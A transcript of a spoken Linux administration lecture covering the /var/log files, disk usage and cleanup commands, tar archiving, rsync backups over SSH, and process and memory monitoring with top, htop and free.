As we discussed in the file system hierarchy standard portion, where we looked at the main hierarchy of the Linux file system, logs are stored inside the /var/log directory. A lot of logs live in this particular directory; it is basically the central location for log files in Linux. You can find system events, service activity, application behavior, security incidents, and everything in between, and by analyzing these logs, sysadmins can troubleshoot issues, monitor system performance, and enhance security. In a lot of cases you do not even have to do it manually: you can use a security appliance to do it for you, take all the logs from this location and feed them into Splunk, for instance, or connect Linux to Splunk so it gets live updates from your logs and helps you analyze the events going on. If you do not want to pay for something like Splunk, you can always use Wazuh, or Kibana from the Elastic Stack, which is another really good open-source tool for looking at log files. It is a very useful location, because it holds the logs for everything that goes on with your system.

Some of the key logs inside the /var/log directory: first, the syslog or messages log. These are the general system log files that record a wide range of system events, including kernel messages and service activity, and which one you have is a distribution difference: syslog is for Debian-based systems like Ubuntu, and messages is for Red Hat-based systems like CentOS or Fedora. journalctl keeps its own series of logs, but in this case you are looking at an actual log file, so we are going to use tail -f to look at the bottom portion of the file.
tail shows you the last 10 lines by default, which are the most recent entries inside the syslog file, and the same goes for the messages file. Another one is the auth log. This file contains information related to authentication and authorization: anybody trying to log in, login attempts whether successful or unsuccessful, user authentication processes, and privilege escalation attempts all get stored in the auth log. Again you would view it with tail -f to see the most recent additions at the bottom of the file. This is very important for spotting unauthorized access attempts and anything else security related; the auth log is one of the key files that security analysts constantly watch, especially in a large environment, because you want to see whether there are failed login attempts, repeated failed attempts, or successful logins coming in at odd hours of the day, to figure out whether people who should not be logging in are logging in or trying to.

Then we have dmesg; I think of it as "d-message." It records messages from the kernel ring buffer, which contains information about hardware components and their status: the initialization of a device, the drivers connected to your system for your printer or anything else physically attached to your computer, and any other hardware errors on your machine. Again you can use tail -f to look at the most recent entries in this particular log. It is very useful for diagnosing hardware issues and understanding the state of kernel activity; remember, the kernel is the bridge that connects us, the user, and everything we run, to the actual hardware inside the physical computer so that we can communicate with it. So for any kind of kernel issue or kernel-level troubleshooting, you would work with the d-message log.

And then we have the secure log, which is specific to Red Hat-based systems like Fedora or Red Hat Enterprise Linux. This file records security-related events, especially those related to Secure Shell as well as other secure services, such as the SFTP and SCP we just covered in the last chapter; anything to do with the secure versions of a specific service gets logged in this file. Since it is for Red Hat-based systems, it would not apply to Ubuntu; it is CentOS, Fedora, and everything along those lines. And the viewing command, which by now you should have memorized, is sudo tail -f followed by the path of the log file.
That gives you the last 10, or 20, or however many lines you designate from the log, which are the most recent incidents recorded in the secure file: failed login attempts and changes to user permissions, for example, which all have to do with security. Anything we covered in the security portion of this training series will, more often than not, show up in this particular log file on Red Hat-based systems.

So, our first examples. To monitor a general system log, you look at syslog on a Debian-based system, or messages on a Red Hat-based system. To look at recent authentication events, you look at the auth log, which covers anything to do with authentication or authorization, and again, tail gives you the last 10 lines, or however many you ask for, representing the most recent entries. If you just want to look at everything inside the file, you can open it up with nano (you would still need sudo nano), but that opens the entire file, which is most likely massive and very overwhelming; you can search through it with grep, one of the tools we have covered, and we will do a lot of this in the practical section, but typically you use tail so you can see the most recent authentication events that have taken place. Another example is kernel messages: you can run dmesg to get all of the kernel messages, or look at the most recent entries in real time with tail -f on the dmesg file. And then there is the secure file for security-related events on a Red Hat system, which could be anything to do with Secure Shell, secure file transfer, or changes to permissions or ownership.

So in summary, we have /var/log, however you want to pronounce it, and this directory is a treasure trove of information; it contains logs for everything. When we get to the practical portion, I will do an ls in there for you so you can see the number of log files inside it; it is massive. The ones we went through are the key log files everybody should know about, but there are literally dozens of log files in this directory, and you can get a lot of different information from them depending on what you are looking for. In a lot of cases, individual applications you install also get their own log entries inside this exact directory: there might be something for MySQL, something for Apache, and a variety of other software services installed on the machine that get their own log files as well. It is just an important location to keep in mind: anything that has to do with security, security administration, or troubleshooting is done from these log files stored inside our /var/log directory.
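The viewing commands from this section in one place, as a sketch; remember the paths differ by distribution family:

```bash
# General system log:
sudo tail -f /var/log/syslog      # Debian-based (Ubuntu)
sudo tail -f /var/log/messages    # Red Hat-based (CentOS, Fedora)

# Authentication and authorization events:
sudo tail -f /var/log/auth.log    # Debian-based
sudo tail -f /var/log/secure      # Red Hat-based

# Kernel ring buffer messages:
dmesg | tail

# Search a huge log instead of scrolling through it in an editor:
sudo grep "Failed password" /var/log/auth.log
```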
These are some of the specific logs you should keep in mind; you have already seen all of them, so I will not go through them again, but feel free to screenshot the summary.

Okay, now we need to look at the usage of the disk itself and any cleanup that needs to be done. We have already looked at the df command, and df and du go hand in hand; together they help you look at everything that has to do with your disk. Disk usage analysis and cleanup are very important for maintaining system performance, because clutter tends to add up inside a system, and you need to make sure you are in good shape on storage, especially if you are managing a bunch of users who all have files and media and everything else they download and use. There need to be disk usage processes in place to make sure you stay on top of storage; this is more important for storage than really anything else, in my opinion, but it is a security issue as well. You want to stay ahead of it so there are no issues and the system does not crash because it runs out of storage, and so nothing slows down because there are simply too many things for the system to take care of.

The two primary tools we have are df and du. df, disk free, is a command-line utility that displays information about the available and used disk space on your file systems. One of the simple invocations is df -h, where the -h option stands for human readable: it formats the output in an understandable way, showing sizes in familiar units, with one line per file system, so you have a good understanding of what you are looking at in the terminal. So df -h gives you the disk usage in a human-readable format.

This is what the output might look like. You run it, and you can see that the first file system, our primary sda1 partition, has a size of 50 GB; 30 GB is used, 20 GB is available, so 60% of the total space has been used, and it is mounted on our root directory. The second partition has 100 GB assigned to it, 70 GB used and 30 GB available, which means 70% usage, and it is mounted on the /home directory inside the root. The home directory specifically is for all of our users, so it makes sense that there is more usage there: most likely multiple users are storing files and media inside that directory, so it uses up a lot more space. That is what the df command helps us find.

du stands for disk usage, and it is a command-line utility that estimates and displays the disk space used by files and directories. It is actually very similar in intent to what we are doing with df; it is really not that different, just a different command that gives you a somewhat different response. You run du -sh followed by the path to a directory.
The -s stands for summary, the total disk usage, and the -h stands for human readable, same as with df. An example command would be du -sh on /home/user, and it just tells you that 5.2 GB has been used in the /home/user directory: disk usage, 5.2 GB, on that particular directory.

If you want to look at a full directory, do a little sorting, and get the top 10 lines, this is what the longer command does: we get a human-readable du listing for a particular path, pipe that result into the sort command, and then take the top 10 lines of all the output we got. du -h gives you the disk usage for the specified path in human-readable format; sort -rh sorts the output in reverse order, which is what the r stands for, based on human-readable sizes, which is what the h stands for; and head -n 10 shows you the top 10 largest directories. If we used tail -n 10 instead, it would give us the bottom 10. Remember, sort typically works in ascending order, alphabetical A to Z or numerical smallest to largest, so if we want to see the largest first, we sort in reverse order; that is why we have the -rh, and then head gives us the top 10, the largest items.

This is what the output might look like when we point it at the /var directory, which has all the logs and everything in it, sorted in reverse order with the top 10 requested. It shows the log directory first, understandably, because there are so many log files and they take up so much space, so /var/log takes the largest share, the most gigabytes. Then you have the cache at 1.8 GB, which is also understandable, the lib directory at 1.2 GB, and www, which has to do with Apache or whatever web server is running, holding 900 megabytes of data.

Some practical examples: df -h gives you the human-readable breakdown by file system, showing how much of each is used and how much is free; du -sh shows you everything going on at a particular path, as a summary in human-readable format; and the full pipeline looks at everything under the home directory, sorts it in reverse order in human-readable format, and gives you the top 10 results. So as a summary, you have df, which provides an overview of disk space usage by file system, makes it easy to see which partitions are filling up, and reports line by line as you already saw, with the command df -h. And you have du, which gives you detailed insight into actual usage by directories and files, so you can identify which areas are consuming the most space; the summarized version for a given directory is du -sh.
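The three commands from this section together, a sketch with illustrative paths:

```bash
# Per-file-system overview in human-readable units:
df -h

# Summarized, human-readable total for a single directory:
du -sh /home/user

# The ten largest entries under /var, biggest first:
du -h /var | sort -rh | head -n 10
```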
And you can analyze a directory further by piping du through the sort command in reverse order and taking the top 10 results. Those are our summaries, and again, we will be running all of this as we go through the practical section, so you will get plenty of opportunities to use it; that does not mean you cannot run these while you are watching this. This is technically the lecture format, as I say at the end of every summary section, so you can definitely run these commands as we go through the lecture, but we are going to do a deep dive on all of these things when we get to the practical section.

So let us talk about disk cleanup tips. Disk cleanup helps maintain system performance and ensures you have adequate storage for new data, and there are essential tips and commands we are going to go through to accomplish all of that. Disk cleanup is a very important concept, something you should be thinking about all the time as a Linux administrator.

Why do we do it? We want to remove unused packages, because they accumulate over time, take up a lot of space, and clutter your overall storage. They can also include dependencies that are no longer required by any installed software, so you want to make sure you get rid of those too: they are literally just taking up space, and nothing is actually using them, because they could be outdated, superseded by upgrades, or irrelevant for a variety of other reasons. You want to do this routinely, in a scheduled manner, so it does not run away from you; you just want to stay on top of it. To remove unused packages, you use the apt package manager: sudo apt autoremove removes packages that were installed as dependencies and are no longer needed by any currently installed package, which is very useful; you do not have to go through the list yourself, you just run it and it automatically removes anything that is irrelevant. On a Red Hat-based system it is the same exact thing with dnf as the package manager: sudo dnf autoremove removes the unnecessary packages and dependencies that are no longer being used.

The second reason is to clear temporary files, which also accumulate inside the /tmp directory and take up disk space. For the most part it is safe to delete all of them; you just have to be sure there is nothing in there you actually need, and no application that may be using some critical temporary file. My approach is that if files were not meant to be temporary, they would not be inside the temporary directory: if they were important, they would have been put inside the key directories, the library directory for that specific application, the opt directory, or one of the other appropriate locations.
If they have been put inside the /tmp directory, for the most part they are fair game to remove. The command is rm with the -rf options, which delete recursively and without prompting, so it removes everything under the /tmp directory. Notice the asterisk at the end of the path: the asterisk is a wildcard character that stands for anything, so /tmp/* means anything that comes after that path gets removed recursively, all files and directories. This is a very powerful command and it permanently deletes everything, so you do have to make sure none of it is still relevant. But again, this is just my philosophy: if it is inside the temp folder, it was most likely going to be deleted anyway, since /tmp typically gets cleared on reboot, or at least after a certain amount of time; otherwise the files would not have been placed there. So for the most part, it is good to go.

Then we have removing older journal logs. The system journal logs everything, even purely informational entries, nothing critical, nothing that needs to be addressed, and over time that adds up to massive log files that take a lot of space. So it is important to periodically clean them, or set up some kind of script to periodically clean them, so that logs are only maintained for, say, six months, or a year, or however long is relevant to you; once that retention period is over, anything older gets deleted and you move on from it, or it gets transferred out of your system onto an external drive or something like that. In a lot of enterprise environments, based on regulatory compliance, you may be required to keep logs for longer than six months, but you can move them from hot storage, which is on the machine and accessible all the time, to warm storage, which could be an external drive that is easily accessible, you just plug it in, or, if they are super old, into cold storage, meaning they are sitting inside a warehouse somewhere and somebody has to go retrieve them to access the information. It just depends on the compliance environment you are in and what it requires. But typically, especially if it is just you on your personal computer, anything older than three to six months you can wipe and move on from; an enterprise environment is a little different, but on a personal machine you really do not need to hold on to log files that long. The way you do this is with the journalctl command and its vacuum-time option, which removes entries older than the window you give it.
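The cleanup commands so far, gathered into one sketch:

```bash
# Remove packages installed as dependencies that nothing needs anymore:
sudo apt autoremove        # Debian-based systems
sudo dnf autoremove        # Red Hat-based systems

# Clear out /tmp; permanent, so be sure nothing in there is still in use:
sudo rm -rf /tmp/*

# Delete journal entries older than two weeks:
sudo journalctl --vacuum-time=2weeks
```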
That command removes journal logs older than two weeks, and you can adjust the time frame as needed, two days, one month, whatever you like, and journalctl will remove entries based on their age. You can clean up packages with sudo apt clean or sudo dnf clean all, which clears the package cache, freeing up the space used by downloaded package files; that one's pretty self-explanatory. Then there's localepurge, which removes unnecessary localization files for languages you don't use on the local machine (the name always makes me chuckle). You have to install it first if it's not already available, and when you run it, it purges all of the unused language files from your machine. You can also find and delete large files, anything larger than 100 MB, for example: here you use the find command, which we've already been introduced to, searching from the root directory for type f (a file) with a size of 100 MB or larger, and once you find those files you can delete them if they're no longer of use to you. Finally, you can analyze disk usage with GUI tools, graphical user interface tools like Disk Usage Analyzer (Baobab) on GNOME or KDirStat on KDE. You'd obviously have to install them, but once you do, you can browse the computer for anything larger than a certain size or older than a certain age and remove those files and folders if they're no longer applicable, or at the very least transfer them to external storage. So in summary, you can use a variety of tools to clean up your disk, and doing this regularly, on a schedule, will help you avoid storage issues. It can be as easy as running autoremove with the apt package manager, doing the same with dnf, recursively removing everything inside the temp folder, or using journalctl with --vacuum-time set to two weeks to delete anything older than that.
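Pulling the cleanup commands from this section together, a minimal sketch might look like the following; the retention period, the 100 MB threshold, and the choice of package manager are just the examples discussed above, so adjust them to your own system:

```bash
# Clear everything inside /tmp (destructive -- make sure nothing in there still matters)
sudo rm -rf /tmp/*

# Remove journal entries older than two weeks (adjust the period as needed, e.g. 2d, 1month)
sudo journalctl --vacuum-time=2weeks

# Clear the package cache (Debian/Ubuntu or Fedora/RHEL respectively)
sudo apt clean
sudo dnf clean all

# Find files larger than 100 MB anywhere under / (review the list before deleting anything)
sudo find / -type f -size +100M
```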
All right, now we need to talk about backups and restoration strategies, and one of the big pieces here is the command known as tar. tar is used to create archives; it's an acronym for tape archive, and it's a command-line utility for creating and manipulating archive files. It bundles multiple files into a single archive file, and it works with directories as well, which makes it easier to store things, transfer them, manage backups, and so on. It supports various compression methods, for example gzip, bzip2, and xz. It's separate from the zip command, which is another command that compresses files and directories into a single compressed file; tar technically creates an archive file rather than a zip file, and that's the key difference, but since it does bundle multiple files together, it serves essentially the same purpose.

To create an archive, you run the tar command with a set of options, then the name of the compressed file you want to create, and then the path to the files you want to compress. Breaking down those options: the -c flag is create, so it creates a new archive; the -z flag compresses it with gzip, producing a gzip file; -v is verbose, meaning the files being processed are displayed on the screen (this isn't necessary for tar to function, it just shows you what's being processed as it goes); and -f specifies the output file name, in this case backup.tar.gz. The -f flag is the one you really need: without it, tar tries to write to a default tape device rather than a regular file, so always include -f and designate the name you want the archive to have. The path at the end is the actual file or directory you want archived; in this case a single path is provided, and everything inside it gets archived into the backup.tar.gz compressed file. So: -c to create, -z to turn it into a gzip file, -f to designate the name, and -v for verbose output so everything is displayed as it's processed.

Then we have the backup of documents. Again you're creating an archive, but now it's a backup of the user's documents: pretty much the same exact command we just ran, except now we've given it the actual path we want. We're creating a backup of the user's home documents folder, and it's being placed into that backup file, with the same options assigned, creating a gzip file for us.
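As a quick sketch of the create operation; the archive name and the path are the example values from the slides, not fixed requirements:

```bash
# Create a gzip-compressed archive of the documents folder
#   -c create, -z gzip compression, -v verbose output, -f output file name
tar -czvf backup.tar.gz /home/user/documents
```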
If you want to extract the archive, you use a similar set of options, though the flags are a little different, and the destination path at the very end requires its own flag as well. Breaking it down: instead of -c we have -x, so instead of creating a file we're extracting one; that's the first flag. The -z now designates that we're decompressing the archive using gzip, so the file needs a .gz extension for this to work; if the archive used a different compression type, you'd use a different option here, but -z means we're decompressing a gzip-compressed file. -v is still verbose, displaying everything that's going on, and -f specifies the input file name, which in this case is backup.tar.gz. Then we've added a capital -C flag, which gives the path to the destination directory for the extracted files. So everything looks almost identical to creating an archive, except we use the -x flag to extract, the -z is still gzip, -v is verbose, -f names the file to be extracted, and -C gives the destination path. As an actual example, we take the backup we just created from the documents and designate the place it should be extracted into, the user's restore/documents folder; it's essentially the same command we just saw with the actual path and the backup file name filled in.

If you want to list the contents of an archive, you can use -tvf. You should already be familiar with -v for verbose and -f to designate the file name; the new piece is the -t flag, which stands for list. It lists the contents of the archive without actually extracting them, so you can look inside without unpacking anything.

If you want to exclude files from the archive, you use a very similar set of options, except for one last piece: the part of the directory that you want excluded. You're still archiving everything under the given path; the only difference is that the excluded portion is not included in the archive file. So you can create an archive and leave a certain portion of the directory out of it. --exclude is the option, and you give it the full path of the directory or file you want left out of the archive being created with tar.
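Here's a rough sketch of the extract, list, and exclude variations; the paths are illustrative, and note that the destination directory has to exist before you extract into it:

```bash
# The destination directory must already exist; -C switches into it before extracting
mkdir -p /home/user/restore/documents
tar -xzvf backup.tar.gz -C /home/user/restore/documents

# List the archive's contents without extracting anything (-t for list)
tar -tvf backup.tar.gz

# Create an archive while leaving one subdirectory out of it
tar -czvf backup.tar.gz /path/to/files --exclude='/path/to/files/exclude_me'
```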
To append a file to an existing archive, you use the -r option. Unfortunately, "r" doesn't obviously map to the word "append" in any way, so this is one you kind of have to memorize, or just save the command for future use. If you're not going to grab the slides from Hackaholic Anonymous, I hope you're at least keeping your own file with these commands inside it; at the very least I hope you're doing that, but you can always come back to this portion of the video and review the archiving functions of tar, so there are plenty of ways to refer back to this. Anyway, we have -v for verbose and -f to designate the file, and in this case the -r flag appends something to the archive: the first argument is the existing archive, and then you give the path to the additional file you want appended into it. This is actually very neat and very useful, because when you create a zip file you can't append anything into it, but you can with tar, which is handy when you just want to add things to an archive without creating a new archive file each time; you keep the same archive and just add to it. For example, with new versions of a log file in the /var/log directory, instead of creating new archives you keep adding the new log files to the same archive as they arrive. You could have a single archive file for the authentication log, the auth log, and any time you do a backup you just append the newly created log file to that same authentication backup archive, which again is very, very handy. One caveat: appending only works on uncompressed .tar archives; tar can't append to a compressed .tar.gz file.

Now we have an example we can walk through to create a backup. It's very similar to what you've already seen: all of the same flags as before, but this time the backup file has the date attached to its name, to give us an understanding of what the backup represents, and the documents folder is what's being backed up; a backup from 11/15/2024 containing all of the contents of the user's documents. Then we have the extraction of that backup: the same exact archive file, except now we're extracting it, using the capital -C flag to designate where we want it extracted to and the -x flag to designate that we're extracting instead of creating. The rest is exactly the same: it's a gzip file, it's verbose, and you designate the file name you're working with; the contents get extracted into the new location for the restored documents. The third example is listing the contents of that backup file (this probably should have been example number two, listing the contents before extracting): -t represents list, so you're listing the contents of this tar archive without extracting them.

And that is it. In summary, tar is obviously very versatile and very powerful, as you just saw from the examples. By mastering just a few key commands you can efficiently back up and restore files, and honestly create a lot of really good scripts, because now that we know we can append to an existing archive with the -r flag, every run of a scheduled backup script, something you'd set up with crontab as a cron job, can reuse the same archive.
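A minimal sketch of appending, using the auth-log example from above; the archive name is illustrative, and appending only works because the archive here is an uncompressed .tar:

```bash
# -r appends to an existing archive; this does not work on compressed .tar.gz files
# (run with sudo if the log file isn't readable by your user)
tar -rvf backup.tar /var/log/auth.log
```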
Every run just appends whatever you're backing up into the same exact archive without creating a new archive file, which honestly I love; it's very useful, very handy. And as I'm going through this I'm thinking, okay, why haven't I created a script for that? So you'd better believe I'm going to write a script that uses the tar command to append the contents of my logs, for my own machines, into the same archive file, which again is just super handy.

Incremental backups with rsync will be our next piece. rsync is a very useful, versatile, efficient utility for synchronizing files and directories between different locations. It's particularly well suited for backups because it transfers only modified files, reducing the time and bandwidth required for the operation: it detects which files in a given location have been modified, and only those get backed up, which again is very useful. The key features are, first, incremental transfer: only modified portions of files are transferred. Think about what it means to sync something: if one new addition or one new modification has been made, just that change gets resynced. It's very similar to what happens with iCloud, for example, where your iCloud storage detects any new additions to your phone's contents and backs those up to the cloud; it won't re-upload everything you previously had, only the new additions get added to your iCloud backup. Second, it's very versatile: it can be used for local backups as well as remote backups over secure shell, which is fantastic. Third, it preserves file attributes: it maintains permissions, timestamps, and the other attributes of the original files as it synchronizes them to the new backup location. A very useful little tool.

The basic command structure is rsync with the -av flags, then the source location, then the destination directory. The -a is for archive: it enables archive mode, which preserves permissions, symlinks, and all the other attributes of the source directory and its contents. The -v is verbose, providing detailed output of the synchronization process on your screen. Then the source directory is the path to the source, and the destination is the path to the destination. A very simple command, not complicated to understand at all: you run rsync with those two flags, give it the source directory and the destination directory, and it does exactly what it should. As a basic sync example using actual directories, it's the same exact command with the archive and verbose flags attached, saying that this user's home documents folder goes into the backup documents folder, and that's pretty much it.
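A minimal sketch of that basic sync, assuming the example paths from the slide:

```bash
# -a archive mode (preserves permissions, timestamps, symlinks), -v verbose.
# The trailing slash on the source means "the contents of documents",
# not the documents directory itself.
rsync -av /home/user/documents/ /backup/documents/
```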
Syncing over SSH, the one I'm most interested in, keeps the initial flags the same, so you still have the archive and verbose flags, but now you add the -e flag, which specifies the remote shell that rsync should use for the transfer, in this case ssh. Then comes the source directory, and then something very similar to what we did with secure copy, if you remember the scp instructions we went through: you have the user at the remote server (which will often be an IP address, so user@remote-IP), then a colon, and then the path to the destination where this backup will land once you run it. You'll probably need to provide a password for that user, unless you've generated an SSH key pair and added your public key to the remote user's authorized_keys file, the store of trusted keys on the remote machine, which means you won't have to enter a password every time. So if you want to run this as part of a scheduled script, inside your cron jobs, you'd definitely need to take the steps we took when we generated keys, so that you have passwordless authentication for SSH; then the sync runs every single time without a password prompt and backs up the directory into its destination. The backup itself isn't complicated; it's actually quite easy. You just designate that you're using the SSH protocol, provide the credentials and the destination, and if you've used key-based authentication you won't be prompted for the password; from there it runs like clockwork. Syncing over SSH is a very, very powerful tool. And here it is in the example: we have alice at a particular IP address, and the files go into the backup documents path for the alice user at that IP. This assumes we already have key-based, passwordless authentication set up for Alice, or that we know Alice's password, in which case we'd enter it as we run the command; then everything in that source location gets backed up to Alice's user profile on that particular server. rsync is a very useful little command.

Next is backing up with deletion. The --delete option ensures that the destination directory mirrors the source directory by deleting files from the destination that no longer exist in the source. This is very useful. Say you had 100 files, you updated 50 of them and deleted the other 50; the destination still has the original 100 because you already did one backup. When you run with this flag, rsync syncs the two locations, and all of the files that were deleted from the source, because you didn't need them anymore, are also deleted from the destination, so the two match exactly: only the files that exist in the source will exist in the destination. A very useful option, and of course it's something you can combine with the other flags; if you're running over SSH you can combine all of those options together and just add --delete, so that anything that no longer exists in the source location is also deleted from the destination, ensuring you're not holding on to old files that are no longer relevant.
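As a sketch of the SSH syncing described above; the username, IP address, and paths here are placeholders, since the slide only shows the general pattern:

```bash
# -e ssh runs the transfer over SSH; the remote side uses scp-style
# user@host:path syntax (alice and 192.168.1.50 are made-up examples)
rsync -av -e ssh /home/user/documents/ alice@192.168.1.50:/backup/documents/
```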
Here's what it actually looks like using --delete with some actual paths: we have /home/user/documents and the backup documents folder, and rsync will synchronize the contents of the home user documents with the backup documents, deleting any files in the destination that are not present in the source; in other words, deleting anything in the backup that no longer exists in the original location. So in our examples, we have rsync with the -av flags, archiving with verbose output, taking the contents of a projects folder and putting them inside a projects backup folder. We have another example done over the SSH protocol, adding the -e ssh flag to designate that the transfer runs over SSH, taking the contents of /home/user/projects and putting them on Alice's profile on a particular server, in the backup projects location. And then we have --delete being added on top; this could be added to the SSH command as well, so you could have -av --delete -e ssh and so on, and that would ensure the destination's contents match the source's: it deletes the things in the destination that are no longer in the source. A very useful series of commands.

We also have a couple of additional options here. There's --progress, which displays detailed progress information for each file during the transfer; it's similar to verbose except it's showing you something like a percentage update per file. We'll be reviewing this in the practical portion so you can see what it looks like, but it displays the progress of each file as the overall transfer takes place. Then we have the preserve-hard-links option, -H, which preserves hard links in the source directory. If you remember, soft links are essentially shortcuts that point to a file, whereas a hard link is another real directory entry for the same file data; it behaves like a second name for the file itself rather than a pointer to its path. So in this case -H preserves all of those hard links. I'd say include this every time you run rsync if you want to keep everything in the source directory intact (deleting whatever's been deleted from the source is fine, but keep the links); it feels like an important option to run every single time.

Then we have compressing the data during transfer, which is another very useful one: the -z option compresses the file data while it's in transit,
reducing the bandwidth used during the transfer. One clarification on how this is often described: -z compresses the data in transit only; the files are decompressed when they arrive, so it saves network bandwidth rather than disk space in the destination directory. This feels like another option you'd use frequently, especially if you're mostly doing this for backup over a network or a slower link. The one time you might skip it is when processing time matters more than bandwidth, for instance on a fast local connection, since compressing and decompressing adds CPU work on both ends. But for the most part, if this is just for backup purposes, for future recovery in case anything happens and your system crashes, I'd say compress the data during transfer.

So in summary, rsync is very useful for incremental backups, because it updates the destination location only with the changes that have been made in the source location. It's flexible, with a range of options that make it suitable for a variety of backup scenarios, both locally and over the network using something like SSH. We have the basic sync command we've gone through, the SSH sync command we've gone through, and the --delete version of the command, which is also very useful and removes anything in the destination that no longer exists in the source. A very, very useful tool, rsync.
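Putting the extra options together in one hedged sketch; combining them into a single command is my own composition, and the username, host, and paths are again placeholders:

```bash
# --delete   remove destination files that no longer exist in the source
# --progress show per-file transfer progress
# -H         preserve hard links from the source
# -z         compress data in transit (saves bandwidth, not disk space)
rsync -avHz --delete --progress -e ssh /home/user/projects/ alice@192.168.1.50:/backup/projects/
```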
Which brings us to system performance monitoring: monitoring the CPU, memory, and running processes using a tool called top. Now, top and htop both perform essentially the same function: they list the processes and services currently running on your computer and show you how much CPU each one is using, how much memory (RAM) each one is using, plus the PIDs and other details for each process. It's a dynamic list, meaning it updates in real time; if something starts taking more memory than the next thing, it moves up the list. It's live monitoring, not something stagnant that you run once and get a fixed list with the line items staying the same. You literally just run top and press Enter, and it provides a dynamic, real-time view of what's going on in the system: the processes running and the amount of resources each one is using. It's included in most Unix operating systems, Linux obviously, and it's actually on macOS as well, so if you run top there, it shows all the processes running on macOS in a live view, along with how much resource each one is using.

This gets used all the time for system administration as well as security. If a computer or a server slows down drastically and you don't know exactly what's going on, you run the top command to see what's running and how much resource each thing is taking, and more often than not you reverse-engineer the problem, not from the name of the service but from how much resource it's using. If something is using a lot of the RAM or a lot of the CPU, you can say, okay, this seems kind of funky, what is this particular process, and then you start the rest of your investigation from there. The command itself is literally: type top, press Enter, and it starts displaying output that's updated regularly. By default it refreshes every few seconds (3 seconds on most Linux systems), and you can change the interval so updates happen every 5 or 10 seconds if the default feels too fast; in my opinion it is a bit too fast, because it's hard to read the entries, so you can change it to a 5-second interval and it'll keep updating continuously, just every 5 seconds instead.

Navigating top is actually very useful to understand, because you can use a lot of different commands to interact with it while it's running: when you type top and press Enter, the output stays on the screen until you exit, and you interact with it as it runs. If you press P while top is running, it sorts everything by CPU usage; think P for processing, as in central processing unit. That makes it easy to identify what's consuming the most CPU. If you press M, you sort by memory, the RAM (random access memory), so it sorts by how much RAM each process is currently using; that one's easy to remember. If you press k, you're ordering top to kill a process: it gives you a prompt to enter the PID of the process you want to kill. So let's say that using P and M you've determined there's one specific process taking up a lot of resources; you press k, provide the PID for that process, and it gets killed immediately by your system, hopefully freeing up those resources. Sometimes you may need to force-kill, which is a different signal, but k by itself will kill a process. If you want to quit top, you simply press q, and it exits the top interface. Remember, when you type top and press Enter, you're inside an interactive interface; once you're done interacting with it, customizing the display, getting the information you need, killing a process, whatever you need to do, you exit by pressing q.
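As a small usage sketch; the 5-second delay is just the example interval discussed above:

```bash
# Refresh every 5 seconds instead of the default
top -d 5

# While top is running:
#   P  sort by CPU usage       M  sort by memory usage
#   k  kill a process (top prompts you for the PID)
#   q  quit the interface
```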
The next one is htop, which is the enhanced version of top. It offers a more user-friendly, colorful, interactive interface, but it provides essentially the same service and utility that top does, just a little more user-friendly: instead of a bunch of black-and-white entries on the screen you get color-coded entries, which improves the usability. You'll need to install it if you don't have it, and it's a sudo command, so sudo apt install htop or sudo dnf install htop, because it does not come pre-installed; top ships with Linux, but htop you have to actually install. Then you run htop, press Enter, and the tool starts; interacting with it is very similar to top, but with an enhanced user experience and easy navigation. Viewing processes is the main screen, giving you the list of processes similar to top but with more detailed and accessible information.

If you want to sort by columns, you press F6. Now, I didn't know what the replacement for F6 is if your keyboard doesn't have it, so I went and got that information for you, and thankfully it's fairly simple: if you don't have the F6 key, you just use the left and right arrow keys to move through the columns at the top of the interface, and once you've highlighted the column you want to sort by, you press Enter, and that's it. Fairly simple, fairly straightforward. I do realize not every keyboard has the F keys; a lot do, and my current Bluetooth keyboard does, but my MacBook doesn't have a dedicated F6. On a MacBook you can press the fn key, which brings up the F keys along the row above the numbers, and use them that way; but sometimes you don't even have that option and you have to work around it. If you have the F keys, amazing; if you don't, use the left and right arrows, press Enter on the highlighted column, and it'll sort by that column for you.

If you want to kill a process in htop, you select the process using the arrow keys and then press F9. The signal to send defaults to SIGTERM, the terminate signal, so F9 lets you interactively terminate the process. And again I needed to find out how to do this if you don't have the F keys, so I went and got that information too: if you don't have the F9 key, you can kill the process using the k key instead.
Use the arrow keys to move up and down the list and highlight the process you want to kill, then press the lowercase k key to open the signal menu; it's an alternative shortcut to F9. After you press it, you'll see a list of signals you can send to end the process. The default signal to terminate a process is SIGTERM, which is signal number 15, terminate; you press Enter to send SIGTERM, which attempts to gracefully terminate the process. If that doesn't work, you force-kill with SIGKILL, which is signal number 9, to forcefully kill the process. So: SIGTERM, signal 15, attempts a graceful termination, but if the process isn't dying, so to speak, you forcefully kill it with SIGKILL, signal 9, and boom, you're done.

Then we have the F3 option, which is search: it lets you enter the name, or part of the name, of a process you want to find, and once you've found it, you can kill it, force-kill it, or get other information about it from there. The substitute for F3, if you don't have it, is the forward slash: press the / key and it opens the search prompt at the bottom of the interface; enter the process name or part of it, press Enter, and you can use the n key to move to the next match if there are multiple instances of the search term. That's how you search for processes by name without the F3 key. Next is quitting htop, which is done with the F10 key, and the alternative here works exactly the way top did: you just press q while it's open and it immediately exits the htop application. So if you don't have F10, you press q and you're good to go.

In summary, both top and htop are very useful tools for monitoring system performance, and each has its own strengths. The strength of top is that it provides a basic yet powerful real-time view of processes and resource usage, with commands like P to sort by CPU and M to sort by memory, and q to quit. htop is the user-friendly version of top, with enhanced features like interactive process management and intuitive search and navigation, driven either by the F keys, as we saw, or by the arrow keys and the various keyboard shortcuts: F9 to kill a process and F3 to search, or the alternatives we covered, k to kill (with the signal menu to force-kill), / to search, and q to quit, and so on. It offers essentially the same usage as top, but it's more user-friendly, because it provides color coding in the output, and you can interact with the results a little better, with more options for doing so.
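A quick reference sketch for htop, with the F-key shortcuts and the no-F-key alternatives from this section noted as comments:

```bash
# htop does not ship pre-installed on most distributions
sudo apt install htop    # Debian/Ubuntu
sudo dnf install htop    # Fedora/RHEL

htop
# Inside htop:
#   F6  (or arrow keys + Enter)  choose the sort column
#   F9  (or k)                   send a signal: SIGTERM (15) first, SIGKILL (9) to force
#   F3  (or /, then n for next)  search for a process by name
#   F10 (or q)                   quit
```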
That's it for top and htop, and now we can move on to free. free is another simple but powerful command-line utility that displays information about the system's memory usage, including both physical memory and swap space. It's vital for monitoring system performance and diagnosing memory-related issues. The command itself is free -h, where the -h option stands for human-readable: it formats the output so it's easier to read, using units like kilobytes, megabytes, or gigabytes. So this is an example output, for example (an example output, for example; welcome to the Department of Redundancy Department). In this case we ran free -h, and we can see the memory usage: the total memory available in RAM as well as the swap space. There's 3 GB currently being used by the RAM, 8 GB free, 239 MB shared, the buff/cache sitting at 4 GB, and a total of 11 GB actually available once all of those are considered; nothing is being used in swap, so that one's all good.

